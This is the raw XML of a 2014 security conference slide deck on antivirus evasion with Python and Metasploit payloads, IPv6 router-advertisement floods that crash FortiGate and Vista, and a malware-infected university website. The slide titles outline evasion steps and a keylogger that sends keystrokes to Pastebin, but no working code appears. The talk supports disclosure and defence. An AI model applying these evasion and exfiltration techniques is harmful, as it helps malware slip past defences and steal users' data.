            <a:ext cx="52705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649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6-06 at 9.45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28" y="799675"/>
            <a:ext cx="74549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622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ly-fe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520"/>
            <a:ext cx="9144000" cy="599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32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Metasploit Payloads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7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97957"/>
            <a:ext cx="7772400" cy="4382255"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/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/>
              <a:t>	Picking on AV</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>		Picking on Fortinet</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>		Picking on Microsoft</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>		Picking on UC Santa Cruz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49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FortiGate 30D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8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IPv6-Enabled Firewall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331" y="1600200"/>
            <a:ext cx="8644317" cy="4525963"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Router at 192.168.1.99</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>"Admin" with no password</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>To enable IPv6 and stateless auto-configuration (SLAAC):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config system interface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edit "wan"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config ipv6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set autoconf enable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end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286876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331" y="1600200"/>
            <a:ext cx="8644317" cy="4525963"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="400050"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>SLAAC address appears</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050"/>
            <a:endParaRPr lang="en-US" dirty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  <a:p>
            <a:pPr marL="400050"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="Screen Shot 2014-05-24 at 7.18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91595"/>
            <a:ext cx="8306988" cy="150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7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Routing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Reasonable size; 10-20 lines</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="Screen Shot 2014-05-24 at 7.20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81" y="3051719"/>
            <a:ext cx="8292556" cy="336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01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of Router Advertisements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8877"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Router GUI and text administration freezes instantly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After flood stops, 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diagnose ipv6 address list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diagnose ipv6 route </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>list</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>have long, unreadable lists</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="Screen Shot 2014-05-24 at 7.2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55137"/>
            <a:ext cx="8263694" cy="13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2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Disable Autoconfiguration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331" y="1600200"/>
            <a:ext cx="8644317" cy="4525963"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="857250" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>config </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>system interface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edit "wan"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config ipv6</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="857250" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>autoconf disable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="857250" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>end</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:latin typeface="Courier"/>
              <a:cs typeface="Courier"/>
            </a:endParaRP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4233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Drives CPU to 100%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7.33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07" y="1827240"/>
            <a:ext cx="66548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6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Responsible Disclosure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told Fortinet on April 24, 2014, and they were able to reproduce it on April 25, 2014</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Revised firmware will be coming out "soon"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4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Firmware Upgrade?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Status, in "System Information", "Firmware Version", click "Details"</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="Screen Shot 2014-05-24 at 7.53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06" y="3041232"/>
            <a:ext cx="6654800" cy="18542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00490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Metasploit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Hundreds of payloads</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The simplest one: bind_tcp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Listens on a TCP port for commands</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="Screen Shot 2014-05-22 at 11.21.3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7"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="491702" y="3733375"/>
            <a:ext cx="8195098" cy="21435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1333" y="4615555"/>
            <a:ext cx="4289778" cy="369332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7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Work!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316163"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>I've never had a vendor succeed in reproducing attacks in &lt;24 hours before</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Submit Vuln Disclosures in Video Form!</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="Screen Shot 2014-05-24 at 10.09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6" y="1600200"/>
            <a:ext cx="8457455" cy="193508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50265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97957"/>
            <a:ext cx="7772400" cy="4382255"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/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/>
              <a:t>	Picking on AV</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br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/>
              <a:t>	Picking on Fortinet</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>		Picking on Microsoft</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>		Picking on UC Santa Cruz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8763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Windows Vista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689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Vulnerable to IPv6 RA Flood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30-90 sec of flood pegs CPU at 100% forever</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Very strange, since Microsoft patched this for</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Windows XP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Windows 7</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Windows 8</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Server 2008</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Server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691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4 at 10.11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5100"/>
            <a:ext cx="83058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292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Responsible Disclosure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Marc Heuse told Microsoft about this on July 10, 2010</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>I told them many times after that</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Is Vista supported or not?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="102424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5675"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>Windows 7 SP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t>1 (2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>/22/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t>2011)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in7SP2-upda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58" y="1281147"/>
            <a:ext cx="6290664" cy="538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4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Vista (1/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>30/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>2007)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ista-upda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0" y="1600200"/>
            <a:ext cx="5961433" cy="508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36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97957"/>
            <a:ext cx="7772400" cy="4382255"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/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/>
              <a:t>	Picking on AV</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br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/>
              <a:t>	Picking on Fortinet</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br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/>
              <a:t>	Picking on Microsoft</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>		Picking on UC Santa Cruz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10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UC Santa Cruz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33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Reverse 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command to produce very simple Windows EXE malware</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="p8-a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0985"/>
            <a:ext cx="8490857" cy="2145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8221" y="3405946"/>
            <a:ext cx="6290029" cy="30880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607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 Hall of Shame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UCSC has been pwned by Russian Viagra sellers since at least Dec. 2013</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>I notified them in Dec. 2013</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>They re-imaged a server</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Exploit came back and spread</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>They won't talk to me or let me help</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>No one cares</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6305178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7000 Infected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Criminals own UCSC and they don't care</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>They just do anything they like</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="Screen Shot 2014-05-24 at 10.20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12" y="3346451"/>
            <a:ext cx="6337300" cy="24511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9267745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0.21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57111"/>
            <a:ext cx="8322309" cy="410213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9134846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0.21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31752"/>
            <a:ext cx="8020377" cy="4068732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0157022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0.26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473919"/>
            <a:ext cx="8537222" cy="77507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Screen Shot 2014-05-24 at 10.25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267655"/>
            <a:ext cx="8571700" cy="3080455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1344562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Maricopa Was Warned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0.27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6273"/>
            <a:ext cx="8183674" cy="232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55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Letter to Jerry Brown and Janet Napolitano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7510"/>
            <a:ext cx="8229600" cy="4338653"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Within 2 days, the infected pages from a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>WordPress</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> blog were removed from UCSC site</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The admin said no servers were compromised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337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6-05 at 3.2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09" y="423357"/>
            <a:ext cx="6323312" cy="449928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Screen Shot 2014-06-05 at 3.27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08007"/>
            <a:ext cx="8328408" cy="918156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3144639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64000"/>
            <a:ext cx="8229600" cy="2480516"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Everything is at samsclass.info</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Instructions for these attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>These Slides</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Videos</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>EVIL APT TOOL</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="Screen Shot 2014-05-25 at 6.10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23" y="1417638"/>
            <a:ext cx="61722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62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Antivirus Catches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8-av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84" y="2030583"/>
            <a:ext cx="7115904" cy="383491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61512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983</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>208</Paragraphs>
  <Slides>88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Violent Python &amp;  The AV Scam PLUS EVIL Super-Advanced APT Tool  IPv6 attacks on FortiGate &amp; Vista UC Santa Cruz Pwned June 6, 2014</vt:lpstr>
      <vt:lpstr>Bio</vt:lpstr>
      <vt:lpstr>Antivirus  Ungh!  Good God y'all...  What is it GOOD For?</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Mikko Hypponen Video</vt:lpstr>
      <vt:lpstr>Metasploit Payloads</vt:lpstr>
      <vt:lpstr>Metasploit</vt:lpstr>
      <vt:lpstr>Simple Reverse Shell</vt:lpstr>
      <vt:lpstr>Antivirus Catches It</vt:lpstr>
      <vt:lpstr>Norton v. Shell.exe</vt:lpstr>
      <vt:lpstr>Norton Identifies the Metasploit Packer</vt:lpstr>
      <vt:lpstr>VirusTotal: 37/49 Detections</vt:lpstr>
      <vt:lpstr>How to Become 007</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Python v. AV Round 1 shell_bind_tcp</vt:lpstr>
      <vt:lpstr>Export Metasploit Payloads to C</vt:lpstr>
      <vt:lpstr>Use Ctypes Python Library</vt:lpstr>
      <vt:lpstr>Compile it on Windows</vt:lpstr>
      <vt:lpstr>DEMO</vt:lpstr>
      <vt:lpstr>DEMO</vt:lpstr>
      <vt:lpstr>VirusTotal: 1/50 Detection</vt:lpstr>
      <vt:lpstr>Norton Support</vt:lpstr>
      <vt:lpstr>Norton Wins!</vt:lpstr>
      <vt:lpstr>Kaspersky Wins!</vt:lpstr>
      <vt:lpstr>Python v. AV Round 2 shell_bind_tcp with a delay</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>DEMO</vt:lpstr>
      <vt:lpstr>Norton, Avast, &amp; MSE Lose!</vt:lpstr>
      <vt:lpstr>Kaspersky Wins!</vt:lpstr>
      <vt:lpstr>Python v. AV Round 3 shell_bind_tcp in two stages no delay</vt:lpstr>
      <vt:lpstr>Other AV</vt:lpstr>
      <vt:lpstr>Remember Mikko?</vt:lpstr>
      <vt:lpstr>F-Secure Wins!</vt:lpstr>
      <vt:lpstr>AV Challenge</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Python v. AV Round 4 shell_bind_tcp with a delay</vt:lpstr>
      <vt:lpstr>INSTRUCTIONS</vt:lpstr>
      <vt:lpstr>INSTRUCTIONS</vt:lpstr>
      <vt:lpstr>Norton Loses</vt:lpstr>
      <vt:lpstr>Kaspersky Wins</vt:lpstr>
      <vt:lpstr>Advanced Malware Protection</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Python Keylogger</vt:lpstr>
      <vt:lpstr>Google "Python Keylogger"</vt:lpstr>
      <vt:lpstr>Post Keystrokes to Pastebin</vt:lpstr>
      <vt:lpstr>Problem</vt:lpstr>
      <vt:lpstr>Kaspersky &amp; Avast! LOSE</vt:lpstr>
      <vt:lpstr>Norton WINS!</vt:lpstr>
      <vt:lpstr>But just add a delay...</vt:lpstr>
      <vt:lpstr>F-Secure LOSES!</vt:lpstr>
      <vt:lpstr>PRODUCT ANNOUNCEMENT!</vt:lpstr>
      <vt:lpstr>Ultra-Advanced APT Tool</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>UNSTOPPABLE</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>✔ Picking on AV   Picking on Fortinet   Picking on Microsoft   Picking on UC Santa Cruz</vt:lpstr>
      <vt:lpstr>FortiGate 30D</vt:lpstr>
      <vt:lpstr>IPv6-Enabled Firewall</vt:lpstr>
      <vt:lpstr>SLAAC</vt:lpstr>
      <vt:lpstr>IPv6 Routing Table</vt:lpstr>
      <vt:lpstr>Flood of Router Advertisements</vt:lpstr>
      <vt:lpstr>Disable Autoconfiguration</vt:lpstr>
      <vt:lpstr>Flood Drives CPU to 100%</vt:lpstr>
      <vt:lpstr>Responsible Disclosure</vt:lpstr>
      <vt:lpstr>Firmware Upgrade?</vt:lpstr>
      <vt:lpstr>Videos Work!</vt:lpstr>
      <vt:lpstr>✔ Picking on AV ✔ Picking on Fortinet   Picking on Microsoft   Picking on UC Santa Cruz</vt:lpstr>
      <vt:lpstr>Windows Vista</vt:lpstr>
      <vt:lpstr>Vulnerable to IPv6 RA Flood</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Responsible Disclosure</vt:lpstr>
      <vt:lpstr>Windows 7 SP 1 (2/22/2011)</vt:lpstr>
      <vt:lpstr>Vista (1/30/2007)</vt:lpstr>
      <vt:lpstr>✔ Picking on AV ✔ Picking on Fortinet ✔ Picking on Microsoft   Picking on UC Santa Cruz</vt:lpstr>
      <vt:lpstr>UC Santa Cruz</vt:lpstr>
      <vt:lpstr>Malware Hall of Shame</vt:lpstr>
      <vt:lpstr>7000 Infected Pages</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Maricopa Was Warned</vt:lpstr>
      <vt:lpstr>Letter to Jerry Brown and Janet Napolitano</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Resources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Violent Python and the AV Scam</dc:title>
  <dc:creator>Sam Bowne</dc:creator>
  <cp:lastModifiedBy>Sam Bowne</cp:lastModifiedBy>
  <cp:revision>183</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2014-05-22T16:10:09Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2014-06-06T16:45:39Z</dcterms:modified>
</cp:coreProperties>
</file>